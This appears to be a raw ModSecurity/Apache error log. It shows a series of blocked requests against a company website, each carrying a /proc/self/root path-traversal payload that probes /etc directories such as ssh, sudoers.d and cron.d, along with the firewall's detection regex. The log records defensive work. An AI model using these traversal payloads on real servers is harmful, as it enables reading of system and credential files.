[Tue Mar 17 11:28:37.528002 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.243.203:60698] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllFdCmCSWTlPouqorXUAAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:38.832199 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.243.203:60714] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllFqt8Nd0UC_OcbVG7FAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:41.035358 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.243.203:60730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllGZqmL8PQht4WJFlTawAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:42.523645 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:60978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllGtCmCSWTlPouqorXUQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:43.874087 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.203:60986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllGweiSKl8TjouI-YMzwAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:45.019353 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.203:60994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllHQeiSKl8TjouI-YM0AAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:46.361193 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:60996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllHqBJNF7axNlVR0UH4gAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:47.561025 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:32778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllHweiSKl8TjouI-YM0QAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:48.774684 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.243.203:32786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllIKt8Nd0UC_OcbVG7FgAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:50.087232 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.243.203:32794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllIjarLhPAjZGI1b25qAAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:52.288589 2026] [:error] [pid 18709:tid 140411548894976] [client 74.7.243.203:33420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllJDarLhPAjZGI1b25rQAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:54.630775 2026] [:error] [pid 9155:tid 140411599251200] [client 74.7.243.203:33434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllJtbI7zhHXcabyMUxFQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:55.980870 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.203:33438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllJ9Y0UrI5A3LftIztrgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:57.293812 2026] [:error] [pid 9155:tid 140411691570944] [client 74.7.243.203:33448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllKdbI7zhHXcabyMUxHgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:59.503241 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.243.203:33464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllK64xEDsg_V3ESNY-jAAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:00.830173 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.203:52926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllLNY0UrI5A3LftIztrwAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:02.565701 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.243.203:52932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllLtCmCSWTlPouqorXVAAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:04.050409 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.243.203:52936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllL64xEDsg_V3ESNY-jQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:05.356661 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.243.203:52944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllMaBJNF7axNlVR0UH5gAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:06.564779 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:52952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllMpqmL8PQht4WJFlTcQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:09.145440 2026] [:error] [pid 9155:tid 140411607643904] [client 74.7.243.203:52968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllNdbI7zhHXcabyMUxNQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
